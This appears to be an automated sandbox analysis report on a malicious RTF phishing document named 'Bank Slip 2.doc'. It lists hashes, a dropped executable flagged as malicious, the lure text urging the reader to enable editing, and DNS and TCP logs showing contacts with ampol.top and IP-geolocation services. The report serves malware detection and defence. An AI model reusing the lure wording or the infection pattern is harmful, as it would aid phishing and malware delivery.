                    SSDEEP:12288:+RfMJlRPMhU1n75ZyoFXm5PpVHSyE7ZhvCgC3UGGqRyUs3PKspeuD3kR:pbRj5ZrXm57ktqRyp3PKSM
                    MD5:DBDACF479A9DD40133701E06E6DC401C
                    SHA1:5E78767CF2498D34FC27674FF326F2A7CE5AB2A3
                    SHA-256:A597F53ED7D5E4CC1AF67800969953F431C7C99467D75A42E3DB360D7302283C
                    SHA-512:F46D0FCE9AD0E9C4A9142E53D02AA903DC082872068DEA6597C8D22E6154F25976A309815A8EFD721B5451CEB3646976D69E664DB261BECD18F250B8FDAA89A6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0...... .......4... ...@....@.. ....................................@..................................4..O....@...............@...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    File type:Rich Text Format data, version 1
                    Entropy (8bit):3.4400007721781107
                    TrID:
                    • Rich Text Format (5005/1) 55.56%
                    • Rich Text Format (4004/1) 44.44%
                    File name:Bank Slip 2.doc
                    File size:424'988 bytes
                    MD5:ff06a87dd0550386be1f780d560f1877
                    SHA1:69e95738ec635520a508f7424a759261e5032cb0
                    SHA256:511c82313461b74fe24201d13dead6a280311d248062e09a465eb950502d1c18
                    SHA512:60e39f9628edbcb5118d53a2887c8f4879260d1d480a6a25960d58366fef2ca248b7115b521ff7de57c61063c1c35da0ac318fc22ad472b38b0cf34ecfd2534c
                    SSDEEP:6144:PGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuVhG+qMh9c:xe
                    TLSH:F094AD6DD34B02598F620377AB571E5142BDBA7EF38552B1305C533933EAC38A2252BE
                    File Content Preview:{\rtf1..{\*\RS49Nonp2wIuEGruVyV2Djh9umOqq84rr6LkQ6ZgzbrhVSD3NN5nPjvlCWJeifzQ7YTznibzmwc5GTKEPbULUKcEBSug8oNvqoN9dBIY6yWLdsZEEfcxc3BKVc5FG}..{\635001118please click Enable editing from the yellow bar above.The independent auditors. opinion says the financi
                    Icon Hash:2764a3aaaeb7bdbf
Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                    000018E8Fhno
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 1, 2024 20:06:13.880681992 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:13.885461092 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.596788883 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.681226969 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:14.686264038 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:14.855660915 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:15.079313993 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:15.079417944 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:15.535375118 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.535418034 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:15.535469055 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.542301893 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:15.542318106 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.055082083 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.055145979 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.061781883 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.061803102 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.062031984 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.154687881 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.196506977 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269197941 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269282103 CEST44349165188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.269325018 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.273058891 CEST49165443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.297147036 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:16.302172899 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:16.461544037 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:16.466016054 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466063976 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.466114998 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466583014 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.466600895 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.671710968 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:16.942408085 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:16.945674896 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:16.945694923 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082071066 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082164049 CEST44349166188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:17.082331896 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:17.082876921 CEST49166443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:17.110625029 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:17.119811058 CEST8049164158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:17.121220112 CEST4916480192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:17.259850025 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.266534090 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:17.267429113 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.267494917 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:17.275788069 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:17.935688019 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.008891106 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.008941889 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.009006977 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.019491911 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.019506931 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.147530079 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.147592068 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.496911049 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.499934912 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.499963045 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647788048 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647866011 CEST44349168188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:18.647916079 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.648660898 CEST49168443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:18.663167000 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.669704914 CEST8049167193.122.6.168192.168.2.22
                    Jul 1, 2024 20:06:18.669768095 CEST4916780192.168.2.22193.122.6.168
                    Jul 1, 2024 20:06:18.692095995 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.697799921 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:18.697880983 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.697963953 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:18.704257965 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:19.171230078 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:19.200259924 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200311899 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.200362921 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200817108 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.200833082 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.370568991 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:19.669378042 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.672338009 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.672362089 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815336943 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815418959 CEST44349170188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:19.815762997 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.816167116 CEST49170443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:19.852691889 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.857667923 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:19.857837915 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.857837915 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:19.863063097 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:21.475548983 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:21.494718075 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.494752884 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.494820118 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.495157957 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.495171070 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.679397106 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:21.962382078 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:21.966178894 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:21.966198921 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097337961 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097443104 CEST44349172188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.097599030 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.098500967 CEST49172443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.117233992 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.124691963 CEST8049171158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.124756098 CEST4917180192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.141630888 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.146589994 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.146671057 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.146749020 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.152816057 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.730767965 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.757034063 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757071018 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.757139921 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757574081 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:22.757586956 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:22.942930937 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:22.948739052 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:22.948790073 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.252070904 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.279973030 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.279999971 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405853033 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405946970 CEST44349174188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.405996084 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.406924963 CEST49174443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.433624029 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.444365025 CEST8049173158.101.44.242192.168.2.22
                    Jul 1, 2024 20:06:23.444420099 CEST4917380192.168.2.22158.101.44.242
                    Jul 1, 2024 20:06:23.462347984 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.467181921 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.467235088 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.467356920 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:23.475538969 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.963009119 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:23.990829945 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.990875959 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:23.991050959 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.991795063 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:23.991808891 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.175354004 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.175595045 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.175776005 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.465935946 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.470196009 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.470205069 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621733904 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621850967 CEST44349176188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:24.621937990 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.622740984 CEST49176443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:24.647885084 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.658638000 CEST8049175193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.661089897 CEST4917580192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.673594952 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.678556919 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:24.681226969 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.681402922 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:24.686417103 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.161417961 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.180502892 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.180551052 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.180607080 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.181060076 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.181072950 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.375566006 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:06:25.375813961 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:06:25.664083004 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.667366982 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.667407036 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818545103 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818624973 CEST44349178188.114.96.3192.168.2.22
                    Jul 1, 2024 20:06:25.818906069 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:06:25.820630074 CEST49178443192.168.2.22188.114.96.3
                    Jul 1, 2024 20:07:24.182925940 CEST8049169193.122.130.0192.168.2.22
                    Jul 1, 2024 20:07:24.183049917 CEST4916980192.168.2.22193.122.130.0
                    Jul 1, 2024 20:07:30.159924984 CEST8049177193.122.130.0192.168.2.22
                    Jul 1, 2024 20:07:30.159982920 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:08:05.185764074 CEST4917780192.168.2.22193.122.130.0
                    Jul 1, 2024 20:08:05.190711021 CEST8049177193.122.130.0192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 20:06:07.536602974 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:07.550009966 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:13.596666098 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:13.605909109 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:13.833112001 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:13.839656115 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:15.521397114 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:15.534264088 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:17.129812956 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:17.151537895 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:17.232973099 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:17.241972923 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:17.243422031 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:17.259255886 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:17.977180004 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:17.984749079 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:18.669584990 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:18.675920010 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:18.678231001 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:18.684806108 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:18.684961081 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:18.691688061 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:19.179575920 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:19.187002897 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:19.187179089 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:19.199649096 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:19.836941957 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:19.843449116 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:19.845614910 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:19.852303028 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:21.482923985 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:21.494229078 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:22.124891043 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:22.132004976 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:22.134511948 CEST | 54842 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:22.141232967 CEST | 53 | 54842 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:22.744748116 CEST | 58105 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:22.756479979 CEST | 53 | 58105 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:23.445455074 CEST | 64928 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:23.451953888 CEST | 53 | 64928 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:23.455499887 CEST | 57390 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:23.461724043 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:23.973303080 CEST | 58095 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:23.990027905 CEST | 53 | 58095 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:24.649343014 CEST | 54261 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:24.661016941 CEST | 53 | 54261 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:24.663788080 CEST | 60507 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:24.670028925 CEST | 53 | 60507 | 8.8.8.8 | 192.168.2.22
Jul 1, 2024 20:06:25.171133995 CEST | 50446 | 53 | 192.168.2.22 | 8.8.8.8
Jul 1, 2024 20:06:25.179678917 CEST | 53 | 50446 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 1, 2024 20:06:07.536602974 CEST | 192.168.2.22 | 8.8.8.8 | 0xa2c2 | Standard query (0) | ampol.top | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.596666098 CEST | 192.168.2.22 | 8.8.8.8 | 0xae9 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.833112001 CEST | 192.168.2.22 | 8.8.8.8 | 0xc115 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:15.521397114 CEST | 192.168.2.22 | 8.8.8.8 | 0x31c9 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.129812956 CEST | 192.168.2.22 | 8.8.8.8 | 0x23ee | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.232973099 CEST | 192.168.2.22 | 8.8.8.8 | 0xcf79 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.243422031 CEST | 192.168.2.22 | 8.8.8.8 | 0xcf79 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.977180004 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ff8 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.669584990 CEST | 192.168.2.22 | 8.8.8.8 | 0x87ad | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.678231001 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdda | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684961081 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdda | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:19.179575920 CEST | 192.168.2.22 | 8.8.8.8 | 0x3812 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:19.187179089 CEST | 192.168.2.22 | 8.8.8.8 | 0x3812 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:19.836941957 CEST | 192.168.2.22 | 8.8.8.8 | 0xbae3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:19.845614910 CEST | 192.168.2.22 | 8.8.8.8 | 0x8a3b | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:21.482923985 CEST | 192.168.2.22 | 8.8.8.8 | 0x1b9e | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:22.124891043 CEST | 192.168.2.22 | 8.8.8.8 | 0xa772 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:22.134511948 CEST | 192.168.2.22 | 8.8.8.8 | 0x9f6f | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:22.744748116 CEST | 192.168.2.22 | 8.8.8.8 | 0xaf1f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:23.445455074 CEST | 192.168.2.22 | 8.8.8.8 | 0x9e69 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:23.455499887 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e18 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:23.973303080 CEST | 192.168.2.22 | 8.8.8.8 | 0x4f9e | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:24.649343014 CEST | 192.168.2.22 | 8.8.8.8 | 0x41d8 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:24.663788080 CEST | 192.168.2.22 | 8.8.8.8 | 0xb21a | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:25.171133995 CEST | 192.168.2.22 | 8.8.8.8 | 0x7a55 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 1, 2024 20:06:07.550009966 CEST | 8.8.8.8 | 192.168.2.22 | 0xa2c2 | No error (0) | ampol.top | | 104.21.53.203 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:07.550009966 CEST | 8.8.8.8 | 192.168.2.22 | 0xa2c2 | No error (0) | ampol.top | | 172.67.218.176 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
